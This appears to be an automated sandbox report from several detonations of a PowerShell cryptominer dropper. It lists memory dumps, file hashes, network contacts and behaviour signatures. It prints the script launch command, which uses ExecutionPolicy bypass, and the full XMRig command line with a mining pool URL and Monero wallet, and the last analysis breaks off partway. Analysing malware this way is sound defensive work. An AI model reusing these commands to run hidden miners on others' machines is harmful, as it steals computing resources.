memory/3824-75-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-76-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-77-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-78-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-79-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-80-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-81-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-82-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-83-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-84-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-85-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-86-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-87-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-88-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-89-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-90-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-91-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-92-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-93-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-94-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-95-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-96-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-97-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-98-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-99-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-100-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-101-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-102-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-103-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-104-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-105-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-106-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-107-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-108-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-109-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-110-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-111-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-112-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-113-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-114-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-115-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-116-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-117-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:08

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1769s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

memory/5040-0-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp

memory/5040-1-0x000001AEE3BC0000-0x000001AEE3BE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kai0klk0.twi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5040-11-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/5040-12-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/5040-14-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/5040-15-0x000001AEE3CD0000-0x000001AEE3CE2000-memory.dmp

memory/5040-16-0x000001AEE3BF0000-0x000001AEE3BFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1668-47-0x000002416CDF0000-0x000002416CE10000-memory.dmp

memory/1668-48-0x000002416D150000-0x000002416D170000-memory.dmp

memory/1668-49-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-50-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-52-0x000002416E950000-0x000002416E970000-memory.dmp

memory/1668-51-0x000002416E930000-0x000002416E950000-memory.dmp

memory/5040-53-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp

memory/5040-54-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/1668-55-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/5040-56-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/1668-57-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-59-0x000002416E950000-0x000002416E970000-memory.dmp

memory/1668-58-0x000002416E930000-0x000002416E950000-memory.dmp

memory/1668-60-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-61-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-62-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-63-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-64-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-65-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-66-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-67-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-68-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-69-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-70-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-71-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-72-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-73-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-74-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-75-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-76-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-77-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-78-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-79-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-80-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-81-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-82-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-83-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-84-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-85-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-86-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-87-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-88-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-89-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-90-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-91-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-92-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-93-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-94-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-95-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-96-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-97-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-98-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-99-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-100-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-101-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-102-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-103-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-104-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-105-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-106-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-107-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-108-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-109-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-110-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-111-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-112-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-113-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-114-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-115-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-116-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-117-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-118-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:39

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/2732-0-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3imtyk4.5g2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2732-10-0x0000021770FC0000-0x0000021770FE2000-memory.dmp

memory/2732-11-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp

memory/2732-12-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp

memory/2732-14-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp

memory/2732-15-0x0000021770F90000-0x0000021770FA2000-memory.dmp

memory/2732-16-0x0000021770AB0000-0x0000021770ABA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1416-47-0x000001B3FBED0000-0x000001B3FBEF0000-memory.dmp

memory/1416-48-0x000001B3FBF20000-0x000001B3FBF40000-memory.dmp

memory/1416-49-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-50-0x000001B3FD700000-0x000001B3FD720000-memory.dmp

memory/1416-51-0x000001B3FD720000-0x000001B3FD740000-memory.dmp

memory/1416-52-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/2732-53-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp

memory/2732-54-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp

memory/1416-55-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-56-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-57-0x000001B3FD700000-0x000001B3FD720000-memory.dmp

memory/1416-58-0x000001B3FD720000-0x000001B3FD740000-memory.dmp

memory/1416-59-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-60-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-61-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-62-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-63-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-64-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-65-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-66-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-67-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-68-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-69-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-70-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-71-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-72-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-73-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-74-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-75-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-76-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-77-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-78-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-79-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-80-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-81-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-82-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-83-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-84-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-85-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-86-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-87-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-88-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-89-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-90-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-91-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-92-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-93-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-94-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-95-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-96-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-97-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-98-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-99-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-100-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-101-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-102-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-103-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-104-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-105-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-106-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-107-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-108-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-109-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-110-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-111-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-112-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-113-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-114-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-115-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-116-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

memory/1416-117-0x00007FF62B900000-0x00007FF62C533000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:39

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1746s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
